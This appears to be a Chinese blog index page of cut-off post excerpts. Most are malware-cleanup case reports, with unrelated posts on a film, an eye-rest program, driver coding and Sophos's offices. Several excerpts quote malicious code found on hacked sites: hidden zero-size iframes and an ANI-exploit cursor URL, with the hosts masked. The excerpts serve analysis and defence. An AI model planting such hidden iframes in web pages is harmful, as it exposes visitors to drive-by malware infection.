其他

beep.sys/Trojan.NtRootKit.1192,msplugplay 1005.sys/BackDoor.Pigeon.13201等1endurer 原創2008-06-24 第1版一位網友反映說他的電腦最近經常彈出廣告視窗，有時反應很慢，運行程式就重啟，請偶幫忙檢修。下載 pe_xscan 掃描 log 並分析，發現如下可疑項： pe_xscan 08-04-26 by Purple Endurer 2008-5-22 12:36:54 Windows XP Service

某文學論壇被掛馬 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avtendurer 原創2007-08-19 第1版Google了一下，發現Google已經標註了：該網站可能含有惡意軟體，有可能會危害您的電腦。 檢查論壇的網頁代碼，被加入：/---＜iframe src='hxxp://a**aa.3*6**96**78.cn/xiaoyu.htm' width=0

endurer 原創2007-06-13 第1版Kaspersky 報告：/---已檢測到: 木馬程式 Trojan-Downloader.JS.Agent.ht 指令碼: hxxp://www.a*b***c.cn/system/login.asp?Type=logout[2]已檢測到: 惡意程式 Exploit.Win32.IMG-ANI.aj URL: hxxp://www.i*f5*6***.cn/ad.jpg---/檢查網頁源檔案，發現ARP病毒自動加入代碼：/---＜iframe

2007-11-30繼續參考卡卡安全助手的顯示資訊，改進了O14 、O15 和 O18 項的內容同時著手在 log 分析工具中 增加 著色功能，讓 log中的惡意項目反白，如：C:/WINDOWS/system32/ctfmon.exe * 2660 | 2004-8-4 0:52:30 | Microsoft? Windows? Operating System | 5.1.2600.2180 | CTF Loader | ? Microsoft Corporation. All

修改系統日期、替換explorer.exe的Trojan-Downloader.Win32.Agent.rjq2endurer 原創 2008-06-19 第1版(繼1)到 http://purpleendurer.ys168.com 下載 FileInfo 和 bat_do。在bat_do輸入命令：ren c:/windows/explorer.exe explorer.exe.bakcopy c:/windows/system32/explorer.exe

遭遇Worm.Win32.Viking.lm/Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等2endurer 原創2007-07-26 第1版看到 C:/WINDOWS/RichDll.dll 和 O4 - HKLM/../Run: [load] C:/WINDOWS/uninstall/rundl132.exe，就讓偶想起Viking……停止並禁用WindowsDown (Windows_SystemDown)卸載百度超級搜霸下載安裝瑞星卡卡安全助手，

pjf(jfpan20000@sina.com)很久沒寫什麼東西，一來文筆太爛，二來我不是一般的懶。這個東西一看題目也就知道又是一篇無聊的文章，湊湊數先。因為最近決定把讀本科時的古董機上的東西收拾一下，看到一些最初學習時的老代碼，回憶往日的時光，還頗有一些感慨呢...以後有空就選一些貼貼，也不怕人笑了。今天第一帖，代碼原是大二時為NT4系統寫的，是原先實踐x86體系寫的，作用是在Driver中“調用”使用者態的MessageBoxA做出顯示。朋友都說：“你無聊不無聊，好多人寫過這個題目了”，呵呵

endurer 原創2007-04-12 第1版網頁被加入代碼：/-----＜iframe src=hxxp://www.xa**it*an.cn/mm/mm.htm width=0 height=0＞＜/iframe＞---/mm.htm包含代碼：/---＜iframe src=hxxp://www.97***72*5.com/?01***6 width=0

　　前段時間看了電影《不敗戰神》，講述了迦太基（Carthage）的著名將領漢尼拔的一生。由於迦太基在第一次布匿戰爭中戰敗，漢尼拔從小就在其父哈米爾卡·巴爾卡（Hamilcar

護眼程式：每隔半小時提示休息2分鐘 距休息時間還有30秒時會通過擴音器發聲提示，並在螢幕右下角顯示倒計時提示窗。 休息期間，螢幕會被護眼程式覆蓋，休息結束時也會通過擴音器發聲提示，螢幕重新顯示。 為了讓程式儘可能少的佔用系統資源，程式採用MASM32編寫，只保留了必要的代碼，連標題列都省了，至於系統托盤表徵圖，檔案版本資訊，支援WinXP的風格之類的東東都不用。

endurer 原創2007-04-09 第1版該論壇採用phpwind系統，被加入代碼：/---＜DIV style="CURSOR: url('hxxp://world***ao**fwr.net/level***/75***17*p.jpg')"＞＜/DIV＞---/hxxp://world***ao**fwr.net/level***/75***17*p.jpg（Kaspersky報為Exploit.Win32.IMG-ANI.p)會利用 ANI漏洞

遭遇beep.sys/Backdoor.Win32.Agent,DOVA/Backdoor.Win32.Hupigon,myRAT.rmvb/Trojan.Win32.Delf等1endurer 原創2008-06-20 第1版一位朋友的電腦，最近電腦反應很慢，瑞星查殺出病毒，清除後一次開機又出現。另外，系統經常提示系統檔案被替換，提示插入系統光碟片進行恢複。請偶幫忙處理。 開啟工作管理員，發現一個名為 1.exe 的進程佔用了大量的CPU時間，先終止了。 使用 pe_xscan 掃描 log

因為工作太忙，好久沒寫程式碼了，不過編寫程式的樂趣令我樂此不疲。 天天跟電腦打交道，一忙起來就忘了休息，弄得眼睛都花了~ 為了保護眼睛，偶決定寫一個定時強制休息的程式~ 雖然現在這類程式已有不少，不過DIY一下還是不錯的~ 先考慮實現倒計時提示視窗，打算讓該視窗漸入漸出~ 這裡用封裝在user32.dll中的API函數AnimateWindow來實現。 函數原型為： BOOL AnimateWindow(       HWND hwnd, //指定產生動畫視窗的控制代碼；

一個據說可以讓瑞星ravmond.exe崩潰的網站endurer 原創2007-08-16 第1版一位呢稱為 raulronaldo 說 有一個網站，多重新整理兩次，然後設定瑞星不顯示病毒提示對話方塊，瑞星會報ravmond錯誤的。檢查發現該網站包含代碼：/---＜iframe src=hxxp://www.i**qy**l.com width=0 height=0＞＜/iframe＞＜iframe src=hxxp://www.8*5*173*3.cn/htm*/goldip.htm?027

遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等2endurer 原創2008-03-06 第1版(續：遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等1)先到 http://purpleendurer.ys168.com 下載

endurer　原創2006-09-19　第2版2006-09-13　第1版有位網友的電腦出現了一個奇怪的現象，關於雙擊*.exe就產生*~.exe，如雙擊a.exe就產生a~.exe。並發來了四個檔案：setup.exe、setup~.exe、Frozen Throne.exe 和 Frozen Throne~.exe。2006-09-13  22:33              203,261 setup.exe2006-09-13  22:37              107,513

wuauclt.exe出錯？wself.bat,abopx.sys等作怪 endurer 原創2008-10-03 第1版 賓館裡的電腦，開機發現裝有小哨兵還原卡，進入案頭後卡巴斯基和360的系統托盤區監控表徵圖露一小臉後消失不定期彈出提示框：  用pe_xscan 掃描log，發現如下可疑項： pe_xscan 08-08-01 by Purple Endurer2008-10-1 20:40:55Windows XP Service Pack 2(5.1.2600)MSIE:6.0.2900

作者： 王琨玥 2005-07-07 03:35 PM不同廠商、不同品牌的資訊安全產品的簡單堆砌，會帶來管理上的巨大麻煩。尤其是，各種安全產品間缺少“交流”，就會形成資訊安全的“盲區”。而避免安全盲區的有效方式，就是對安全產品進行統一管理。可以說，對安全產品的統一管理是構建資訊安全系統的中樞神經，也能夠使防範效果事半功倍。 安全不是簡單堆疊

iemnaw.dll為無效映像?毒霸瑞星也玩失蹤?原來中了Win32.Logogo,RootKit.Win32.HideFile等2endurer 原創2008-04-19 第1版(續1)開始修複~重啟電腦到帶網路連接的安全模式下到 http://endurer.ys168.com 下載 bat_do 和 FileInfo。用 FileInfo 提取log中紅色標記的檔案資訊，用 bat_do 將 log中紅色標記的檔案 打包備份並延時刪除。到 http://purpleendurer.ys16

自：CNET在英國牛津郡一幢大樓的玻璃牆後面就是反惡意程式碼軟體公司Sophos的英國總部。請和我們一起在The Pentagon裡面漫遊。 靠近牛津的Sophos大樓的外觀由公司的兩位執行總裁設計。由於其安全特性而被稱為‘The Pentagon’。外圍的護城河用來阻止非法襲擊者，而停車場包含能夠升起以阻止車輛自由出入的路障。 門廊通向第一層的會客室和大餐廳，遊客在這些地方無需安全許可。遊客進入第二層和第三層（包括反病毒實驗室）則需要許可，而且必須由Sophos的職員陪同